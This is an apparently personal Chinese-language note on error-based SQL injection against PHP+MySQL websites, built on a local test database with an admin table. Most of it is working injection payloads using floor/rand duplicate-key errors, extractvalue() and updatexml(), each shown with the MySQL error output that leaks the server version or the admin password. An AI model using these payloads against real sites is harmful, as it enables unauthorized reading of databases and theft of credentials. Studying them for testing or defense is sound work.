放点原来的笔记。MySQL 在执行语句出错时会抛出异常信息，而 PHP+MySQL 架构的网站往往又把数据库错误信息直接显示在页面上；只要错误信息能被回显到页面，就可以通过构造如下三种方法获取特定数据。
实际测试环境：

mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+
1、通过 floor 报错
可以通过如下一些利用代码：

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
举例如下：
首先进行正常查询：
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
假如 id 参数存在注入的话，可以通过如下语句触发报错：

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
可以看到 MySQL 的版本号随错误信息一起被爆出；如果需要查询其他数据，可以通过修改 version() 所在位置的语句来进行查询。
例如我们需要查询管理员用户名和密码：
Method1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2、ExtractValue
测试语句如下：

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程：

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3、UpdateXml
测试语句：

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
实际测试过程：

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
That's all — thanks to the foreign guys.
